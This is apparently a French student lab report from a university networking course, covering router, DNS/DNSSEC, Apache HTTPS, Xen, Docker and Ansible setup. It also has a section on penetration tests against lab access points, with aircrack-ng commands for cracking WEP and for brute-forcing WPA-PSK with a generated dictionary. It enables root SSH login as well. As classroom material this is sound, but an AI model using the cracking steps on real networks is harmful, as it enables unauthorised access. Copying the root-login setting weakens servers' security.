 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51989</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51989"/>
				<updated>2020-01-02T22:36:51Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Création des Réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
